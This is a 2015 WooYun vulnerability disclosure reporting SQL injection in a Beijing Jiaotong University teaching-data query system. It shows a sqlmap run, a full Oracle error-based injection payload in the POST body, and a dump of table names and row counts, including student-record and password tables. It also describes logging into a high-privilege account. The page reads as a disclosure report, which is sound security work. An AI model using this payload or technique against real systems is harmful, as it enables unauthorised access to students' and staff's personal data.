当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162563

漏洞标题:北京交通大学某通用查询系统SQL注入(全校学籍信息+各学院骨干信息+海量数据)

相关厂商:北京交通大学

漏洞作者: xyntax

提交时间:2015-12-19 13:18

修复时间:2015-12-24 13:20

公开时间:2015-12-24 13:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-19: 细节已通知厂商并且等待厂商处理中
2015-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

北京交通大学数据查询
教学管理类
学业警示情况查询
学生课程加分查询
申请延期毕业获批学生查询
校外保研学校统计查询
推荐免试攻读硕士学位研究生查询
提前毕业学生查询
辅修专业情况查询
本科生招生专业统计查询
本科生CET4成绩统计查询
本科生CET6成绩统计查询
开课情况查询
主干课教授、副教授上课率查询
理论课教授、副教授上课率查询
主干课程开课情况查询
本科生报到注册情况查询
本科生转专业情况查询
各专业在校学生人数统计查询
主讲本科课程教授、副教授统计查询
主干课教授、副教授上课率统计查询
理论课教授、副教授上课率统计查询
主干课程开课情况统计查询
批准缓考学生查询
取消考核资格学生名单查询
本科生参加中外交流项目查询
外籍教师查询
兼职教师查询
教学研究改革类
精品教材查询
规划教材查询
铁路特色教材查询
教材出版基金资助教材查询
精品课程查询
精品开放课程查询
双语教学示范课程查询
校级教改项目查询
专业课程设置查询
本科教学教材选用情况统计查询(专业)
本科教学教材选用情况统计查询(开课学院)
开设专业研究方法课程群情况统计查询
各专业主干课程查询
公开出版电子课件、教学软件查询
发表的教改论文、专著、调研报告查询
课程四进情况查询
教材选用情况查询
课程网站应用情况查询
双语课程开课情况查询
全英文授课开课情况查询
学院开展教学研究活动查询
学院领导专题研究教学工作情况查询
开设专业科学研究方法课程情况查询
国际班查询
实践教学类
实验室基础信息查询
竞赛基本信息查询
学科门类查询
本科生获得专利情况查询
开设实验项目信息查询
本科生课程设计情况查询
共建校内实验室、实习基地查询
共建校外实验室、实习基地查询
本科生实验、实习经费查询
主干课程教师基本信息查询
主干课程教学团队统计查询1
主干课程教学团队统计2查询
毕业设计的管理和质量查询
毕业设计成绩查询
毕业设计成绩统计查询
毕业设计过程检查情况查询
毕业设计题目类型统计查询
毕业设计题目来源统计查询
毕业设计指导教师职称统计查询
毕业设计指导教师指导人数统计查询
教师听课情况汇总
教师听课情况统计
名师公开课听课汇总表
名师公开课听课统计表
优秀主讲教师上课情况查询
优秀主讲教师上课情况统计查询
专业主干课程评教成绩统计查询
优秀主讲教师查询
优秀实验指导教师查询
教学名师奖查询
教学团队查询
专业认证(评估)情况查询
其它
本科专业查询
专业负责人信息查询
教务处各类文件查询
系统管理
角色管理
用户管理


使用任意学生或教职工可登录:

aaa.png


默认可使用这个查询功能,全部都是注入点

2015-12-18 21:47:19屏幕截图.png


以提交的数据6664为例测试

root@kali:~$ sqlmap -r t -p 6664
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150922}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:49:26
[21:49:26] [INFO] parsing HTTP request from 't'
[21:49:26] [INFO] resuming back-end DBMS 'oracle'
[21:49:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: 6664 (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: 6658=2000&6659=daf&6660=2&6662=dsfa&6663=fasd&6664=01' AND 7972=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (7972=7972) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'rmeU'='rmeU&6666=asf&6667=sadf&6678=ÊÇ&currentPage=1&cxczf0==&cxczf1=like&cxczf2==&cxczf3==&cxczf4=like&cxczf5==&cxczf6==&cxczf7=like&cxczf8==&cxid0=6658&cxid1=6659&cxid2=6660&cxid3=666&cxid4=6663&cxid5=6664&cxid6=6666&cxid7=6667&cxid8=6678&cxl0=901&cxl1=902&cxl2=903&cxl3=905&cxl4=906&cxl5=907&cxl6=909&cxl7=910&cxl8=921&id=732&ifftj0=0&ifftj1=0&ifftj2=0&ifftj3=0&ifftj4=0&ifftj5=0&ifftj6=0&ifftj7=0&ifftj8=0&is_input_orderItemCount=6&is_input_orderItem_0=6657^asc&is_input_orderItem_1=6662^desc&is_input_orderItem_2=6658^desc&is_input_orderItem_3=6660^desc&is_input_orderItem_4=6664^desc&is_input_orderItem_5=6666^desc&pxlx=desc&srchStr0=&srchStr1=&srchStr2=&srchStr3=&srchStr4=&srchStr5=&srchStr6=&srchStr7=&srchStr8=&tjsize=9&ztjIdStr0=&ztjIdStr1=&ztjIdStr2=&ztjIdStr3=&ztjIdStr4=&ztjIdStr5=&ztjIdStr6=&ztjIdStr7=&ztjIdStr8=&ztjListStr0=&ztjListStr1=&ztjListStr2=&ztjListStr3=&ztjListStr4=&ztjListStr5=&ztjListStr6=&ztjListStr7=&ztjListStr8=
---
[21:49:26] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle


2015-12-18 21:51:19屏幕截图.png


泄漏数据及数量,其中第四行XS_XJB=学生学籍表(猜的)有2.5w数据

2015-12-18 21:52:47屏幕截图.png


跑一条证明:

nihao.png


拿到高权限帐号登入,可以看到如下海量信息:
各学院骨干信息

yz.png


管理员功能

2015-12-18 21:34:14屏幕截图.png


2015-12-18 21:34:27屏幕截图.png


2015-12-18 21:34:38屏幕截图.png


2015-12-18 21:34:47屏幕截图.png


2015-12-18 21:34:57屏幕截图.png


2015-12-18 21:35:05屏幕截图.png


漏洞证明:

看这个界面的版权和数据库里的表,做的比较成熟了,不确定是不是通用.

2015-12-18 22:06:07屏幕截图.png


Database: JDYWJW
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| XK_XKB | 1127134 |
| KW_BKXSB | 482115 |
| ZC_ZCB | 205425 |
| SYS_YHMMB | 28936 |
| XS_XJB | 25258 |
| RW_JSB | 23626 |
| RW_LLB | 23362 |
| RW_PKB | 23222 |
| RW_XKB | 23222 |
| JH_ZXJXJHKCB | 17476 |
| XS_XJYDB | 10560 |
| CODE_KCB | 9475 |
| NDTJ_KC_KKQKHZB | 8119 |
| CODE_JSB | 3591 |
| NDTJ_KC_JSSKQKB_QXLLK | 2902 |
| T_SEARCH_CXL | 2420 |
| T_SEARCH_LJBXX | 2370 |
| CODE_BJB | 2156 |
| HC_TOOL_IMPORTCOLUMN | 1089 |
| NDTJ_BYSJ_CJHZB | 1043 |
| NDTJ_XKJS_CSRB | 955 |
| CODE_XK_XKMLB | 738 |
| NDTJ_BKS_XYJSB | 627 |
| NDTJ_KC_SYXMZDJSB | 597 |
| NDTJ_KC_ZGKRKJSQKB | 584 |
| NDTJ_XKJS_ZDJSB | 579 |
| NDTJ_KC_ZYZGKCB | 553 |
| NDTJ_BKS_TJMSB | 541 |
| HC_TOOL_IMPORTCOLUMN_MULTI | 522 |
| CODE_XK_XKZYB | 506 |
| NDTJ_XKJS_QKB | 484 |
| NDTJ_KC_JSSKQKB_ZYZGK | 483 |
| NDTJ_KC_ZYZGKCKKQKB | 483 |
| NDTJ_SYS_SJBZDB | 430 |
| HC_SYS_ROLETREE | 417 |
| NDTJ_KC_YXJSSKHZB | 409 |
| XXFW_QX | 407 |
| NDTJ_KC_SJQKHZB | 402 |
| NDTJ_KC_SYXMLXB | 402 |
| NDTJ_KC_SYXMZLB | 396 |
| NDTJ_KC_SYXMXXB | 377 |
| NDTJ_JXYJ_XYHDHZB | 374 |
| NDTJ_JS_YXZJJSB | 353 |
| XX_INFOR | 328 |
| NDTJ_KC_JSTKHZB | 281 |
| NDTJ_BKS_QXKHZGMDB | 270 |
| HC_SYS_TREE | 259 |
| NDTJ_JXYJ_XYLDZTYJHZB | 256 |
| CODE_GBB | 240 |
| CODE_GBDMB | 240 |
| NDTJ_ZY_ZXBKSQKB | 230 |
| NDTJ_BKS_ZZYQKB | 229 |
| T_SEARCH_CLX_YHXZ | 193 |
| NDTJ_BKS_SXDDJSB | 171 |
| NDTJ_SYS_SYNC_LOG | 159 |
| NDTJ_BKS_SXZLB | 156 |
| NDTJ_BKS_SXSXB | 150 |
| NDTJ_BKS_YQBYB | 146 |
| CODE_ZYB | 145 |
| NDTJ_CG_JGLWWCRB | 136 |
| NDTJ_PROBLEM | 124 |
| NDTJ_BKS_ZWJLHZB | 120 |
| NDTJ_SYS_SJBXXB | 118 |
| NDTJ_HD_JSJBXXB | 99 |
| T_SEARCH_BJBXX | 93 |
| T_SEARCH_CX | 89 |
| XXFW_CX | 89 |
| XXFW_FBML | 89 |
| HC_SYS_USERROLE | 86 |
| NDTJ_BKS_HKXSB | 86 |
| NDTJ_JC_XYQKHZB | 85 |
| XXFW_SYS_USERROLE | 85 |
| HC_TOOL_IMPORT | 66 |
| NDTJ_KC_YJXJXFFKCB | 64 |
| CODE_ZCB | 59 |
| NDTJ_KC_BKKCJSTJB2 | 59 |
| CODE_MZB | 58 |
| NDTJ_ZY_BKZYB | 57 |
| NDTJ_JC_ZYXYQKTJB | 55 |
| NDTJ_KC_MSGKKTKHZB | 55 |
| NDTJ_CG_JGLWB | 54 |
| NDTJ_KC_MSJSGKKHZB | 53 |
| NDTJ_SYS_JCXXB | 53 |
| NDTJ_BKS_ZSZYQKB | 46 |
| NDTJ_KC_ZYKCB | 46 |
| NDTJ_SYS_KFNRB | 44 |
| CODE_XNXQB | 42 |
| NDTJ_JS_WJJSHZB | 41 |
| NDTJ_SYS_SYNC | 41 |
| NDTJ_KC_BKKCJSTJB | 40 |
| NDTJ_JS_JZJSHZB | 38 |
| NDTJ_KC_KCJSTJB_QXLLK | 38 |
| T_SEARCH_CXLTJ_VALUETEXT | 38 |
| NDTJ_JC_JPWCRB | 34 |
| CODE_KQB | 33 |
| NDTJ_JC_JPJCB | 30 |
| NDTJ_SYS_KFSJB | 29 |
| NDTJ_JXGL_RYQKHZB | 27 |
| NDTJ_JC_XYXYQKTJB | 26 |
| NDTJ_BKS_SXDXB | 24 |
| NDTJ_BKS_ZCQKB | 24 |
| NDTJ_KC_KCJSTJB_ZYZGK | 24 |
| NDTJ_KC_KKTJB_ZYZGK | 24 |
| CODE_XKMLB | 23 |
| CODE_XNB | 23 |
| NDTJ_BKS_FXQKB | 23 |
| NDTJ_KC_SYKHZB | 23 |
| JH_ZXJXJHB | 22 |
| CODE_KCLB | 21 |
| CODE_NDB | 21 |
| NDTJ_JC_JJZZWCRB | 21 |
| CODE_XSB | 20 |
| NDTJ_BKS_CET6CJTJB | 19 |
| CODE_YDLB | 18 |
| NDTJ_BKS_CET4CJTJB | 18 |
| NDTJ_BKS_WBYSJZGQKHZB | 18 |
| NDTJ_JC_JJZZJCB | 18 |
| NDTJ_SYS_XZGJSYSB | 18 |
| CODE_XKZTB | 17 |
| NDTJ_JC_WCRB | 17 |
| NDTJ_ZY_BKZYFZRHZB | 17 |
| CODE_NJB | 16 |
| NDTJ_JS_YXSYZDJSB | 16 |
| NDTJ_JXYJ_JGXMB | 16 |
| NDTJ_KC_ZYKXYJFFKCHZB | 16 |
| NDTJ_KC_BKSKCSJB | 14 |
| NDTJ_KC_YXJSSKTJB | 14 |
| NDTJ_BYSJ_GCJCB | 13 |
| XXFW_SYS_ROLE | 13 |
| NDTJ_JC_JCLXB | 12 |
| NDTJ_KC_QYWSKHZB | 12 |
| CODE_XJZTB | 11 |
| CODE_XWB | 11 |
| HC_SYS_ROLE | 11 |
| NDTJ_SYS_KFGLHZB | 11 |
| CODE_JC_GHPCB | 10 |
| NDTJ_JC_JCHZB | 10 |
| NDTJ_JXYJ_GJBHZB | 10 |
| RW_ZTB | 10 |
| CODE_SYS_KFNRB | 9 |
| CODE_YDYYB | 9 |
| CODE_ZY_TLZYFXB | 9 |
| NDTJ_SYS_BKSSYJFB | 9 |
| CODE_PKZDFSB | 8 |
| CODE_SHZTB | 8 |
| NDTJ_KC_WZYYQKB | 8 |
| NDTJ_KC_ZYYJFFKCQTJB | 8 |
| CODE_BYSJ_ZCJDJB | 7 |
| CODE_JC_JCLXB | 7 |
| CODE_ZWB | 7 |
| CODE_JCB | 6 |
| CODE_KC_SYLXB | 6 |
| CODE_XDFSB | 6 |
| CODE_XKJS_HJDJB | 6 |
| NDTJ_JC_GHWCRB | 6 |
| NDTJ_KC_SYJXSFKCB | 6 |
| NDTJ_SYS_SXJDB | 6 |
| XXFW_ML | 6 |
| CODE_JC_PYLBB | 5 |
| CODE_JC_SYCCB | 5 |
| CODE_KC_JXMSB | 5 |
| CODE_LW_KWLBB | 5 |
| CODE_PYFSB | 5 |
| CODE_XLB | 5 |
| CODE_XSLB | 5 |
| CODE_YX_YXLBB | 5 |
| NDTJ_JC_GHJCB | 5 |
| NDTJ_LW_BKSLWWCRB | 5 |
| NDTJ_LW_BKSLWXXB | 5 |
| NDTJ_LW_BKSZDJSB | 5 |
| CODE_BKS_SXZDZLLXB | 4 |
| CODE_BYSJ_GLZLDJB | 4 |
| CODE_BYSJ_TMLXB | 4 |
| CODE_BYSJ_TMLYB | 4 |
| CODE_JS_JSJBB | 4 |
| CODE_JXGL_XWB | 4 |
| CODE_KC_SYZDZLLXB | 4 |
| CODE_LW_LWLBB | 4 |
| CODE_PYCCB | 4 |
| CODE_WJLXB | 4 |
| CODE_XZLXB | 4 |
| CODE_BKS_ZTHJLB | 3 |
| CODE_CG_ZLLXB | 3 |
| CODE_FLFXB | 3 |
| CODE_JC_ZYLBB | 3 |
| CODE_JL_HJJBB | 3 |
| CODE_KCFLB | 3 |
| CODE_KCLBB | 3 |
| CODE_KCSXB | 3 |
| CODE_KYXL_XMJBB | 3 |
| CODE_KYXL_XMLYB | 3 |
| CODE_KYXL_XMXZB | 3 |
| CODE_SYS_SFZXJBB | 3 |
| CODE_ZLLXB | 3 |
| PX_CSZTB | 3 |
| CODE_BKS_SXXSB | 2 |
| CODE_JC_JPJCJBB | 2 |
| CODE_JXYJ_JGXMLXB | 2 |
| CODE_KC_JPKCLBB | 2 |
| CODE_KC_SYXZB | 2 |
| CODE_KSLXB | 2 |
| CODE_LW_YTXMLBB | 2 |
| CODE_SFB | 2 |
| CODE_SYS_SYSLXB | 2 |
| CODE_XQB | 2 |
| CODE_ZY_RZJGB | 2 |
| NDTJ_CG_JGLWWJB | 2 |
| NDTJ_JS_HXGLRYHJHZB | 2 |
| NDTJ_SYS_CSB | 2 |
| XXFW_SYS_USER | 2 |
| CODE_JL_JLXSB | 1 |
| CODE_JL_JLXXB | 1 |
| CODE_SYSTEM | 1 |
| CODE_XQLXB | 1 |
| NDTJ_BKS_TQBYXSB | 1 |
| NDTJ_LW_LWWJB | 1 |
| WJ_DWJB | 1 |
+----------------------------+---------+

修复方案:


来个20吧~

版权声明:转载请注明来源 xyntax@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-24 13:20

厂商回复:

最新状态:

暂无